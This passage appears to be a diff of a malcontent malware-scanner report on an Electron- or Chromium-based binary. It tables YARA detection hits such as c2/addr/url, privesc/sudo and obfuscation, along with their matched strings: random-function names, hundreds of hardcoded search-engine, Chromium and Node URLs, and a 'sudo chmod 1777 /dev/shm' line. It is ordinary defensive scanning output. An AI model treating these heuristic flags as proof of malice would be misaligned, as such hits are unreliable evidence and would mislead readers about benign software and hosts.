[http://autocomplete.nigma.ru/complete/query_help.php?suggest=true](http%3A%2F%2Fautocomplete.nigma.ru%2Fcomplete%2Fquery_help.php%3Fsuggest%3Dtrue)
[https://search.privacywall.org/suggest.php?q=](https%3A%2F%2Fsearch.privacywall.org%2Fsuggest.php%3Fq%3D)
[http://search.incredibar.com/search.php?q=](http%3A%2F%2Fsearch.incredibar.com%2Fsearch.php%3Fq%3D)
[http://searchfunmoods.com/results.php?q=](http%3A%2F%2Fsearchfunmoods.com%2Fresults.php%3Fq%3D)
[ofpluginspage/index.php?remained](https://github.com/search?q=ofpluginspage%2Findex.php%3Fremained&type=code)
[https://m.so.com/index.php?ie=](https%3A%2F%2Fm.so.com%2Findex.php%3Fie%3D)
[examplepersonallyindex.php?](https://github.com/search?q=examplepersonallyindex.php%3F&type=code) | | MEDIUM | [net/url/encode](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/encode.yara#url_encode) | encodes URL, likely to pass GET variables | [urlencode](https://github.com/search?q=urlencode&type=code) | -| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[request(url,](https://github.com/search?q=request%28url%2C&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | +| MEDIUM | [net/url/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/request.yara#requests_urls) | requests resources via URL | [http.request](https://github.com/search?q=http.request&type=code)
[request\(url,](https://github.com/search?q=request%28url%2C&type=code)
[net/url](https://github.com/search?q=net%2Furl&type=code) | | MEDIUM | [net/webrtc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/webrtc.yara#webrtc_peer) | makes outgoing WebRTC connections | [RTCPeerConnection](https://github.com/search?q=RTCPeerConnection&type=code) | | MEDIUM | [os/kernel/opencl](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/opencl.yara#OpenCL) | support for OpenCL | [OpenCL](https://github.com/search?q=OpenCL&type=code) | | MEDIUM | [privesc/sudo](https://github.com/chainguard-dev/malcontent/blob/main/rules/privesc/sudo.yara#sudo) | calls sudo | [sudo chmod 1777 /dev/shm](https://github.com/search?q=sudo+chmod+1777+%2Fdev%2Fshm&type=code) | @@ -96,8 +96,8 @@ | MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | | LOW | [anti-behavior/random_behavior](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-behavior/random_behavior.yara#random) | uses a random number generator | [ReactiveTraceAtRandomIntervals](https://github.com/search?q=ReactiveTraceAtRandomIntervals&type=code)
[UdpSocketRandomBindErrorCode](https://github.com/search?q=UdpSocketRandomBindErrorCode&type=code)
[ConnectRandomPortForHTTPS](https://github.com/search?q=ConnectRandomPortForHTTPS&type=code)
[asyncRefillRandomIntCache](https://github.com/search?q=asyncRefillRandomIntCache&type=code)
[http3_grease_randomness](https://github.com/search?q=http3_grease_randomness&type=code)
[random_anchor_sampling](https://github.com/search?q=random_anchor_sampling&type=code)
[RandomAccessFileRead](https://github.com/search?q=RandomAccessFileRead&type=code)
[createRandomPrimeJob](https://github.com/search?q=createRandomPrimeJob&type=code)
[suppress_randomnessE](https://github.com/search?q=suppress_randomnessE&type=code)
[NewRandomAccessFile](https://github.com/search?q=NewRandomAccessFile&type=code)
[fuzzer_random_seedE](https://github.com/search?q=fuzzer_random_seedE&type=code)
[random_gc_intervalE](https://github.com/search?q=random_gc_intervalE&type=code)
[random_tree_trainer](https://github.com/search?q=random_tree_trainer&type=code)
[CreateRandomString](https://github.com/search?q=CreateRandomString&type=code)
[compaction_randomE](https://github.com/search?q=compaction_randomE&type=code)
[g_random_int_range](https://github.com/search?q=g_random_int_range&type=code)
[suppressRandomness](https://github.com/search?q=suppressRandomness&type=code)
[GenerateRandomKey](https://github.com/search?q=GenerateRandomKey&type=code)
[RandomBytesConfig](https://github.com/search?q=RandomBytesConfig&type=code)
[RandomBytesTraits](https://github.com/search?q=RandomBytesTraits&type=code)
[RandomPrimeConfig](https://github.com/search?q=RandomPrimeConfig&type=code)
[RandomPrimeTraits](https://github.com/search?q=RandomPrimeTraits&type=code)
[math_random_cache](https://github.com/search?q=math_random_cache&type=code)
[math_random_index](https://github.com/search?q=math_random_index&type=code)
[math_random_state](https://github.com/search?q=math_random_state&type=code)
[pseudoRandomBytes](https://github.com/search?q=pseudoRandomBytes&type=code)
[randomCacheOffset](https://github.com/search?q=randomCacheOffset&type=code)
[lazyCryptoRandom](https://github.com/search?q=lazyCryptoRandom&type=code)
[getRandomValues](https://github.com/search?q=getRandomValues&type=code)
[RandomBytesJob](https://github.com/search?q=RandomBytesJob&type=code)
[randomFillSync](https://github.com/search?q=randomFillSync&type=code)
[v8_random_seed](https://github.com/search?q=v8_random_seed&type=code)
[crypto_random](https://github.com/search?q=crypto_random&type=code)
[math_randomEv](https://github.com/search?q=math_randomEv&type=code)
[popLinkRandom](https://github.com/search?q=popLinkRandom&type=code)
[RandomToggle](https://github.com/search?q=RandomToggle&type=code)
[cryptoRandom](https://github.com/search?q=cryptoRandom&type=code)
[ucc128random](https://github.com/search?q=ucc128random&type=code)
[_randomUUID](https://github.com/search?q=_randomUUID&type=code)
[randomBytes](https://github.com/search?q=randomBytes&type=code)
[MathRandom](https://github.com/search?q=MathRandom&type=code)
[random_get](https://github.com/search?q=random_get&type=code)
[randomblob](https://github.com/search?q=randomblob&type=code)
[RandomByH](https://github.com/search?q=RandomByH&type=code)
[RandomPrH](https://github.com/search?q=RandomPrH&type=code)
[getrandom](https://github.com/search?q=getrandom&type=code)
[randomInt](https://github.com/search?q=randomInt&type=code)
[randomize](https://github.com/search?q=randomize&type=code)
[uv_random](https://github.com/search?q=uv_random&type=code)
[random_r](https://github.com/search?q=random_r&type=code)
[randomly](https://github.com/search?q=randomly&type=code)
[urandom](https://github.com/search?q=urandom&type=code) | | LOW | [anti-static/obfuscation/obfuscate](https://github.com/chainguard-dev/malcontent/blob/main/rules/anti-static/obfuscation/obfuscate.yara#obfuscate) | Mentions the word obfuscate | [obfuscate_location_parse_error](https://github.com/search?q=obfuscate_location_parse_error&type=code)
[obfuscated_field_name](https://github.com/search?q=obfuscated_field_name&type=code)
[obfuscated_file_util](https://github.com/search?q=obfuscated_file_util&type=code)
[obfuscated_name](https://github.com/search?q=obfuscated_name&type=code) | -| LOW | [c2/addr/url](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/url.yara#binary_with_url) | binary contains hardcoded URL | [https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithm_params.h](https://github.com/chromium/chromium/blob/HEAD/third_party/blink/public/platform/web_crypto_algorithm_params.h)
[http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js](http://src.chromium.org/viewvc/blink/trunk/Source/devtools/front_end/SourceMap.js)
[https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6](https://github.com/nodejs/node/commit/ec2822adaad76b126b5cccdeaa1addf2376c9aa6)
[https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4](https://github.com/nodejs/node/commit/f7620fb96d339f704932f9bb9a0dceb9952df2d4)
[https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js](https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/repairES5.js)
[https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js](https://github.com/google/caja/blob/HEAD/src/com/google/caja/ses/startSES.js)
[https://publickeyservice.aws.privacysandboxservices.com/v1alpha/publicKeys](https://publickeyservice.aws.privacysandboxservices.com/v1alpha/publicKeys)
[http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico](http://linkurystoragenorthus.blob.core.windows.net/static/favicon.ico)
[http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx](http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Default.aspx)
[https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js](https://github.com/acornjs/acorn/blob/master/acorn/src/identifier.js)
[http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx](http://search.iminent.com/SearchTheWeb/v6/1033/homepage/Result.aspx)
[https://www.google.com/images/branding/product/ico/googleg_lodp.ico](https://www.google.com/images/branding/product/ico/googleg_lodp.ico)
[http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico](http://ms1.iol.it/graph_hf/v.8.3.04/themes/default/img/favicon.ico)
[https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch](https://search.yahooapis.jp/AssistSearchService/V2/webassistSearch)
[https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable](https://storage.ape.yandex.net/get/browser/Doodles/yandex/drawable)
[http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico](http://static.mediacentrum.sk/katalog/atlas.sk/images/favicon.ico)
[https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico](https://ssl.pstatic.net/sstatic/search/favicon/favicon_140327.ico)
[http://certificates.godaddy.com/repository/gd_intermediate.crt0](http://certificates.godaddy.com/repository/gd_intermediate.crt0)
[https://www.bluetooth.com/specifications/gatt/characteristics](https://www.bluetooth.com/specifications/gatt/characteristics)
[https://www.gstatic.com/securitykey/a/google.com/origins.json](https://www.gstatic.com/securitykey/a/google.com/origins.json)
[http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png](http://find.in.gr/Themes/1/Default/Media/Layout/icon_in.png)
[https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico](https://yastatic.net/lego/_/rBTjd6UOPk5913OSn5ZQVYMTQWQ.ico)
[https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js](https://cs.chromium.org/chromium/src/v8/tools/SourceMap.js)
[https://developers.google.com/web/updates/2016/08/removing](https://developers.google.com/web/updates/2016/08/removing)
[https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico](https://yastatic.net/lego/_/pDu9OWAQKB0s2J9IojKpiS_Eho.ico)
[http://crl.comodoca.com/COMODOCertificationAuthority.crl0](http://crl.comodoca.com/COMODOCertificationAuthority.crl0)
[http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html](http://www.3waylabs.com/nw/WWW/products/wizcon/vt220.html)
[https://www.bluetooth.com/specifications/gatt/descriptors](https://www.bluetooth.com/specifications/gatt/descriptors)
[https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt](https://www.unicode.org/Public/UNIDATA/EastAsianWidth.txt)
[https://developers.cloudflare.com/1.1.1.1/privacy/public](https://developers.cloudflare.com/1.1.1.1/privacy/public)
[http://search.iminent.com/Shared/Images/favicon_gl.ico](http://search.iminent.com/Shared/Images/favicon_gl.ico)
[https://developer.chrome.com/docs/extensions/mv3/cross](https://developer.chrome.com/docs/extensions/mv3/cross)
[https://html.spec.whatwg.org/multipage/webappapis.html](https://html.spec.whatwg.org/multipage/webappapis.html)
[https://www.bluetooth.com/specifications/gatt/services](https://www.bluetooth.com/specifications/gatt/services)
[https://www.chromestatus.com/feature/5629582019395584.](https://www.chromestatus.com/feature/5629582019395584.)
[https://www.chromestatus.com/feature/5644273861001216.](https://www.chromestatus.com/feature/5644273861001216.)
[https://www.chromestatus.com/feature/5682658461876224.](https://www.chromestatus.com/feature/5682658461876224.)
[https://www.chromestatus.com/feature/5742188281462784.](https://www.chromestatus.com/feature/5742188281462784.)
[https://www.chromestatus.com/feature/5851021045661696.](https://www.chromestatus.com/feature/5851021045661696.)
[https://beacons.gcp.gvt2.com/domainreliability/upload](https://beacons.gcp.gvt2.com/domainreliability/upload)
[https://nodejs.org/static/images/favicons/favicon.ico](https://nodejs.org/static/images/favicons/favicon.ico)
[https://www.chromestatus.com/feature/4664843055398912](https://www.chromestatus.com/feature/4664843055398912)
[https://www.chromestatus.com/feature/5082396709879808](https://www.chromestatus.com/feature/5082396709879808)
[https://www.chromestatus.com/feature/5093566007214080](https://www.chromestatus.com/feature/5093566007214080)
[https://www.chromestatus.com/feature/5148698084376576](https://www.chromestatus.com/feature/5148698084376576)
[https://www.chromestatus.com/feature/5527160148197376](https://www.chromestatus.com/feature/5527160148197376)
[https://www.chromestatus.com/feature/5636954674692096](https://www.chromestatus.com/feature/5636954674692096)
[https://www.chromestatus.com/feature/5654791610957824](https://www.chromestatus.com/feature/5654791610957824)
[https://www.chromestatus.com/feature/5667793157488640](https://www.chromestatus.com/feature/5667793157488640)
[https://www.chromestatus.com/feature/5669008342777856](https://www.chromestatus.com/feature/5669008342777856)
[https://www.chromestatus.com/feature/5718547946799104](https://www.chromestatus.com/feature/5718547946799104)
[https://www.chromestatus.com/feature/5738264052891648](https://www.chromestatus.com/feature/5738264052891648)
[https://www.chromestatus.com/feature/5745543795965952](https://www.chromestatus.com/feature/5745543795965952)
[https://www.chromestatus.com/feature/5749447073988608](https://www.chromestatus.com/feature/5749447073988608)
[https://www.chromestatus.com/feature/6662647093133312](https://www.chromestatus.com/feature/6662647093133312)
[http://autocomplete.nigma.ru/complete/query_help.php](http://autocomplete.nigma.ru/complete/query_help.php)
[http://crl.comodoca.com/AAACertificateServices.crl06](http://crl.comodoca.com/AAACertificateServices.crl06)
[https://cdn.ecosia.org/assets/images/ico/favicon.ico](https://cdn.ecosia.org/assets/images/ico/favicon.ico)
[https://clients2.google.com/domainreliability/upload](https://clients2.google.com/domainreliability/upload)
[https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md](https://github.com/tc39/ecma262/blob/HEAD/LICENSE.md)
[https://html.spec.whatwg.org/multipage/browsers.html](https://html.spec.whatwg.org/multipage/browsers.html)
[https://www.electronjs.org/docs/tutorial/application](https://www.electronjs.org/docs/tutorial/application)
[https://www.info.com/static/www.info.com/favicon.ico](https://www.info.com/static/www.info.com/favicon.ico)
[https://www.privacywall.org/images/favicon_32x32.ico](https://www.privacywall.org/images/favicon_32x32.ico)
[http://ak.apnstatic.com/media/images/favicon_search](http://ak.apnstatic.com/media/images/favicon_search)
[https://search.goo.ne.jp/cdn/common/img/favicon.ico](https://search.goo.ne.jp/cdn/common/img/favicon.ico)
[https://suggest.search.daum.net/sushi/opensearch/pc](https://suggest.search.daum.net/sushi/opensearch/pc)
[https://www.bing.com/sa/simg/bing_p_rr_teal_min.ico](https://www.bing.com/sa/simg/bing_p_rr_teal_min.ico)
[https://www.googleapis.com/geolocation/v1/geolocate](https://www.googleapis.com/geolocation/v1/geolocate)
[http://arianna.libero.it/search/abin/integrata.cgi](http://arianna.libero.it/search/abin/integrata.cgi)
[https://beacons2.gvt2.com/domainreliability/upload](https://beacons2.gvt2.com/domainreliability/upload)
[https://beacons3.gvt2.com/domainreliability/upload](https://beacons3.gvt2.com/domainreliability/upload)
[https://beacons4.gvt2.com/domainreliability/upload](https://beacons4.gvt2.com/domainreliability/upload)
[https://beacons5.gvt2.com/domainreliability/upload](https://beacons5.gvt2.com/domainreliability/upload)
[https://beacons5.gvt3.com/domainreliability/upload](https://beacons5.gvt3.com/domainreliability/upload)
[https://bugs.chromium.org/p/chromium/issues/detail](https://bugs.chromium.org/p/chromium/issues/detail)
[https://github.com/electron/electron/issues/18397.](https://github.com/electron/electron/issues/18397.)
[https://source.chromium.org/chromium/chromium/src/](https://source.chromium.org/chromium/chromium/src/)
[http://crl.comodo.net/AAACertificateServices.crl0](http://crl.comodo.net/AAACertificateServices.crl0)
[http://dictionaryperceptionrevolutionfoundationpx](http://dictionaryperceptionrevolutionfoundationpx)
[https://beacons.gvt2.com/domainreliability/upload](https://beacons.gvt2.com/domainreliability/upload)
[https://github.com/w3c/ServiceWorker/issues/1356.](https://github.com/w3c/ServiceWorker/issues/1356.)
[https://nodejs.org/download/release/v16.14.2/node](https://nodejs.org/download/release/v16.14.2/node)
[https://www.cisco.com/c/en/us/about/legal/privacy](https://www.cisco.com/c/en/us/about/legal/privacy)
[https://www.sogou.com/images/logo/old/favicon.ico](https://www.sogou.com/images/logo/old/favicon.ico)
[http://start.iminent.com/StartWeb/1033/homepage/](http://start.iminent.com/StartWeb/1033/homepage/)
[https://code.google.com/p/chromium/issues/detail](https://code.google.com/p/chromium/issues/detail)
[https://www.gstatic.com/securitykey/origins.json](https://www.gstatic.com/securitykey/origins.json)
[https://chromium.googlesource.com/chromium/src/](https://chromium.googlesource.com/chromium/src/)
[https://clients2.google.com/service/update2/crx](https://clients2.google.com/service/update2/crx)
[https://redirector.gvt1.com/edgedl/chrome/dict/](https://redirector.gvt1.com/edgedl/chrome/dict/)
[https://sp.ask.com/sh/i/a16/favicon/favicon.ico](https://sp.ask.com/sh/i/a16/favicon/favicon.ico)
[http://certificates.godaddy.com/repository100.](http://certificates.godaddy.com/repository100.)
[https://bugs.chromium.org/p/dawn/issues/detail](https://bugs.chromium.org/p/dawn/issues/detail)
[https://electronjs.org/docs/tutorial/security.](https://electronjs.org/docs/tutorial/security.)
[https://en.wikipedia.org/wiki/ANSI_escape_code](https://en.wikipedia.org/wiki/ANSI_escape_code)
[https://perfetto.dev/docs/contributing/getting](https://perfetto.dev/docs/contributing/getting)
[http://ns.adobe.com/AcrobatAdhocWorkflow/1.0/](http://ns.adobe.com/AcrobatAdhocWorkflow/1.0/)
[https://html.spec.whatwg.org/multipage/timers](https://html.spec.whatwg.org/multipage/timers)
[https://malaysia.search.yahoo.com/favicon.ico](https://malaysia.search.yahoo.com/favicon.ico)
[https://malaysia.search.yahoo.com/sugg/chrome](https://malaysia.search.yahoo.com/sugg/chrome)
[https://monitoring.url.loader.factory.invalid](https://monitoring.url.loader.factory.invalid)
[http://nigma.ru/themes/nigma/img/favicon.ico](http://nigma.ru/themes/nigma/img/favicon.ico)
[https://bugs.chromium.org/p/v8/issues/detail](https://bugs.chromium.org/p/v8/issues/detail)
[https://github.com/gpuweb/gpuweb/issues/1565](https://github.com/gpuweb/gpuweb/issues/1565)
[http://clients3.google.com/cert_upload_json](http://clients3.google.com/cert_upload_json)
[https://developer.chrome.com/blog/immutable](https://developer.chrome.com/blog/immutable)
[https://github.com/electron/electron/tree/v](https://github.com/electron/electron/tree/v)
[https://github.com/joyent/node/issues/3295.](https://github.com/joyent/node/issues/3295.)
[https://github.com/nodejs/node/issues/13435](https://github.com/nodejs/node/issues/13435)
[https://github.com/nodejs/node/issues/19009](https://github.com/nodejs/node/issues/19009)
[https://github.com/nodejs/node/issues/31074](https://github.com/nodejs/node/issues/31074)
[https://github.com/nodejs/node/issues/34532](https://github.com/nodejs/node/issues/34532)
[https://github.com/nodejs/node/issues/35475](https://github.com/nodejs/node/issues/35475)
[https://github.com/nodejs/node/issues/35862](https://github.com/nodejs/node/issues/35862)
[https://github.com/nodejs/node/issues/35981](https://github.com/nodejs/node/issues/35981)
[https://github.com/nodejs/node/issues/39707](https://github.com/nodejs/node/issues/39707)
[https://github.com/nodejs/node/issues/39758](https://github.com/nodejs/node/issues/39758)
[https://github.com/tc39/ecma262/issues/1209](https://github.com/tc39/ecma262/issues/1209)
[http://search.softonic.com/img/favicon.ico](http://search.softonic.com/img/favicon.ico)
[https://buscador.terra.com.ar/Default.aspx](https://buscador.terra.com.ar/Default.aspx)
[https://developer.chrome.com/blog/enabling](https://developer.chrome.com/blog/enabling)
[https://developers.google.com/speed/public](https://developers.google.com/speed/public)
[https://doh.cleanbrowsing.org/doh/security](https://doh.cleanbrowsing.org/doh/security)
[https://github.com/nodejs/node/issues/2006](https://github.com/nodejs/node/issues/2006)
[https://github.com/nodejs/node/issues/2119](https://github.com/nodejs/node/issues/2119)
[https://github.com/nodejs/node/issues/3392](https://github.com/nodejs/node/issues/3392)
[https://github.com/nodejs/node/pull/26334.](https://github.com/nodejs/node/pull/26334.)
[https://github.com/nodejs/node/pull/33515.](https://github.com/nodejs/node/pull/33515.)
[https://search.privacywall.org/suggest.php](https://search.privacywall.org/suggest.php)
[https://searchatlas.centrum.cz/favicon.ico](https://searchatlas.centrum.cz/favicon.ico)
[https://www.privacywall.org/search/secure/](https://www.privacywall.org/search/secure/)
[http://www.ibm.com/data/dtd/v11/ibmxhtml1](http://www.ibm.com/data/dtd/v11/ibmxhtml1)
[https://esdiscuss.org/topic/isconstructor](https://esdiscuss.org/topic/isconstructor)
[https://github.com/libuv/libuv/pull/1501.](https://github.com/libuv/libuv/pull/1501.)
[https://github.com/nodejs/node/pull/12342](https://github.com/nodejs/node/pull/12342)
[https://github.com/nodejs/node/pull/12607](https://github.com/nodejs/node/pull/12607)
[https://github.com/nodejs/node/pull/13870](https://github.com/nodejs/node/pull/13870)
[https://github.com/nodejs/node/pull/21313](https://github.com/nodejs/node/pull/21313)
[https://github.com/nodejs/node/pull/30380](https://github.com/nodejs/node/pull/30380)
[https://github.com/nodejs/node/pull/30958](https://github.com/nodejs/node/pull/30958)
[https://github.com/nodejs/node/pull/33661](https://github.com/nodejs/node/pull/33661)
[https://github.com/nodejs/node/pull/34010](https://github.com/nodejs/node/pull/34010)
[https://github.com/nodejs/node/pull/34103](https://github.com/nodejs/node/pull/34103)
[https://github.com/nodejs/node/pull/34375](https://github.com/nodejs/node/pull/34375)
[https://github.com/nodejs/node/pull/34385](https://github.com/nodejs/node/pull/34385)
[https://github.com/nodejs/node/pull/35949](https://github.com/nodejs/node/pull/35949)
[https://github.com/nodejs/node/pull/36061](https://github.com/nodejs/node/pull/36061)
[https://github.com/nodejs/node/pull/38248](https://github.com/nodejs/node/pull/38248)
[https://github.com/nodejs/node/pull/38433](https://github.com/nodejs/node/pull/38433)
[https://github.com/nodejs/node/pull/38614](https://github.com/nodejs/node/pull/38614)
[https://mathiasbynens.be/notes/javascript](https://mathiasbynens.be/notes/javascript)
[https://sugg.sogou.com/sugg/ajaj_json.jsp](https://sugg.sogou.com/sugg/ajaj_json.jsp)
[https://www.bing.com/images/detail/search](https://www.bing.com/images/detail/search)
[http://search.incredibar.com/favicon.ico](http://search.incredibar.com/favicon.ico)
[https://doh.cleanbrowsing.org/doh/family](https://doh.cleanbrowsing.org/doh/family)
[https://doh.familyshield.opendns.com/dns](https://doh.familyshield.opendns.com/dns)
[https://github.com/addaleax/eventemitter](https://github.com/addaleax/eventemitter)
[https://github.com/nodejs/node/pull/1771](https://github.com/nodejs/node/pull/1771)
[https://github.com/nodejs/node/pull/3394](https://github.com/nodejs/node/pull/3394)
[https://malaysia.search.yahoo.com/search](https://malaysia.search.yahoo.com/search)
[https://stackoverflow.com/a/5501711/3561](https://stackoverflow.com/a/5501711/3561)
[http://buscar.terra.com.ar/Default.aspx](http://buscar.terra.com.ar/Default.aspx)
[http://search.incredibar.com/search.php](http://search.incredibar.com/search.php)
[http://start.sweetpacks.com/favicon.ico](http://start.sweetpacks.com/favicon.ico)
[http://www.w3.org/TR/html4/frameset.dtd](http://www.w3.org/TR/html4/frameset.dtd)
[https://api.oceanhero.today/suggestions](https://api.oceanhero.today/suggestions)
[https://ar.search.yahoo.com/favicon.ico](https://ar.search.yahoo.com/favicon.ico)
[https://ar.search.yahoo.com/sugg/chrome](https://ar.search.yahoo.com/sugg/chrome)
[https://at.search.yahoo.com/favicon.ico](https://at.search.yahoo.com/favicon.ico)
[https://at.search.yahoo.com/sugg/chrome](https://at.search.yahoo.com/sugg/chrome)
[https://au.search.yahoo.com/favicon.ico](https://au.search.yahoo.com/favicon.ico)
[https://au.search.yahoo.com/sugg/chrome](https://au.search.yahoo.com/sugg/chrome)
[https://br.search.yahoo.com/favicon.ico](https://br.search.yahoo.com/favicon.ico)
[https://br.search.yahoo.com/sugg/chrome](https://br.search.yahoo.com/sugg/chrome)
[https://ca.search.yahoo.com/favicon.ico](https://ca.search.yahoo.com/favicon.ico)
[https://ca.search.yahoo.com/sugg/chrome](https://ca.search.yahoo.com/sugg/chrome)
[https://ch.search.yahoo.com/favicon.ico](https://ch.search.yahoo.com/favicon.ico)
[https://ch.search.yahoo.com/sugg/chrome](https://ch.search.yahoo.com/sugg/chrome)
[https://cl.search.yahoo.com/favicon.ico](https://cl.search.yahoo.com/favicon.ico)
[https://cl.search.yahoo.com/sugg/chrome](https://cl.search.yahoo.com/sugg/chrome)
[https://co.search.yahoo.com/favicon.ico](https://co.search.yahoo.com/favicon.ico)
[https://co.search.yahoo.com/sugg/chrome](https://co.search.yahoo.com/sugg/chrome)
[https://creativecommons.org/licenses/by](https://creativecommons.org/licenses/by)
[https://de.search.yahoo.com/favicon.ico](https://de.search.yahoo.com/favicon.ico)
[https://de.search.yahoo.com/sugg/chrome](https://de.search.yahoo.com/sugg/chrome)
[https://dk.search.yahoo.com/favicon.ico](https://dk.search.yahoo.com/favicon.ico)
[https://doh.cleanbrowsing.org/doh/adult](https://doh.cleanbrowsing.org/doh/adult)
[https://es.search.yahoo.com/favicon.ico](https://es.search.yahoo.com/favicon.ico)
[https://es.search.yahoo.com/sugg/chrome](https://es.search.yahoo.com/sugg/chrome)
[https://fi.search.yahoo.com/favicon.ico](https://fi.search.yahoo.com/favicon.ico)
[https://fr.search.yahoo.com/favicon.ico](https://fr.search.yahoo.com/favicon.ico)
[https://fr.search.yahoo.com/sugg/chrome](https://fr.search.yahoo.com/sugg/chrome)
[https://github.com/w3c/gamepad/pull/112](https://github.com/w3c/gamepad/pull/112)
[https://github.com/w3c/gamepad/pull/120](https://github.com/w3c/gamepad/pull/120)
[https://hk.search.yahoo.com/favicon.ico](https://hk.search.yahoo.com/favicon.ico)
[https://hk.search.yahoo.com/sugg/chrome](https://hk.search.yahoo.com/sugg/chrome)
[https://id.search.yahoo.com/favicon.ico](https://id.search.yahoo.com/favicon.ico)
[https://id.search.yahoo.com/sugg/chrome](https://id.search.yahoo.com/sugg/chrome)
[https://in.search.yahoo.com/favicon.ico](https://in.search.yahoo.com/favicon.ico)
[https://in.search.yahoo.com/sugg/chrome](https://in.search.yahoo.com/sugg/chrome)
[https://log.getdropbox.com/log/expectct](https://log.getdropbox.com/log/expectct)
[https://mx.search.yahoo.com/favicon.ico](https://mx.search.yahoo.com/favicon.ico)
[https://mx.search.yahoo.com/sugg/chrome](https://mx.search.yahoo.com/sugg/chrome)
[https://nl.search.yahoo.com/favicon.ico](https://nl.search.yahoo.com/favicon.ico)
[https://nl.search.yahoo.com/sugg/chrome](https://nl.search.yahoo.com/sugg/chrome)
[https://nz.search.yahoo.com/favicon.ico](https://nz.search.yahoo.com/favicon.ico)
[https://nz.search.yahoo.com/sugg/chrome](https://nz.search.yahoo.com/sugg/chrome)
[https://pe.search.yahoo.com/favicon.ico](https://pe.search.yahoo.com/favicon.ico)
[https://pe.search.yahoo.com/sugg/chrome](https://pe.search.yahoo.com/sugg/chrome)
[https://ph.search.yahoo.com/favicon.ico](https://ph.search.yahoo.com/favicon.ico)
[https://ph.search.yahoo.com/sugg/chrome](https://ph.search.yahoo.com/sugg/chrome)
[https://qc.search.yahoo.com/favicon.ico](https://qc.search.yahoo.com/favicon.ico)
[https://qc.search.yahoo.com/sugg/chrome](https://qc.search.yahoo.com/sugg/chrome)
[https://se.search.yahoo.com/favicon.ico](https://se.search.yahoo.com/favicon.ico)
[https://sg.search.yahoo.com/favicon.ico](https://sg.search.yahoo.com/favicon.ico)
[https://sg.search.yahoo.com/sugg/chrome](https://sg.search.yahoo.com/sugg/chrome)
[https://th.search.yahoo.com/favicon.ico](https://th.search.yahoo.com/favicon.ico)
[https://th.search.yahoo.com/sugg/chrome](https://th.search.yahoo.com/sugg/chrome)
[https://tr.search.yahoo.com/favicon.ico](https://tr.search.yahoo.com/favicon.ico)
[https://tw.search.yahoo.com/favicon.ico](https://tw.search.yahoo.com/favicon.ico)
[https://tw.search.yahoo.com/sugg/chrome](https://tw.search.yahoo.com/sugg/chrome)
[https://uk.search.yahoo.com/favicon.ico](https://uk.search.yahoo.com/favicon.ico)
[https://uk.search.yahoo.com/sugg/chrome](https://uk.search.yahoo.com/sugg/chrome)
[https://ve.search.yahoo.com/favicon.ico](https://ve.search.yahoo.com/favicon.ico)
[https://ve.search.yahoo.com/sugg/chrome](https://ve.search.yahoo.com/sugg/chrome)
[https://vn.search.yahoo.com/favicon.ico](https://vn.search.yahoo.com/favicon.ico)
[https://vn.search.yahoo.com/sugg/chrome](https://vn.search.yahoo.com/sugg/chrome)
[https://www.yandex.com.tr/chrome/newtab](https://www.yandex.com.tr/chrome/newtab)
[http://buscar.terra.com.ar/favicon.ico](http://buscar.terra.com.ar/favicon.ico)
[http://i.rl0.ru/2011/icons/rambler.ico](http://i.rl0.ru/2011/icons/rambler.ico)
[http://i.wp.pl/a/i/stg/500/favicon.ico](http://i.wp.pl/a/i/stg/500/favicon.ico)
[http://search.conduit.com/Results.aspx](http://search.conduit.com/Results.aspx)
[http://start.sweetpacks.com/search.asp](http://start.sweetpacks.com/search.asp)
[http://www.apache.org/licenses/LICENSE](http://www.apache.org/licenses/LICENSE)
[http://www.w3.org/TR/xhtml1/DTD/xhtml1](http://www.w3.org/TR/xhtml1/DTD/xhtml1)
[https://buscador.terra.es/Default.aspx](https://buscador.terra.es/Default.aspx)
[https://datatracker.ietf.org/doc/draft](https://datatracker.ietf.org/doc/draft)
[https://gist.github.com/XVilka/8346728](https://gist.github.com/XVilka/8346728)
[https://github.com/KhronosGroup/Vulkan](https://github.com/KhronosGroup/Vulkan)
[https://search.yahoo.co.jp/favicon.ico](https://search.yahoo.co.jp/favicon.ico)
[http://buscador.terra.es/Default.aspx](http://buscador.terra.es/Default.aspx)
[http://search.babylon.com/favicon.ico](http://search.babylon.com/favicon.ico)
[http://search.sweetim.com/favicon.ico](http://search.sweetim.com/favicon.ico)
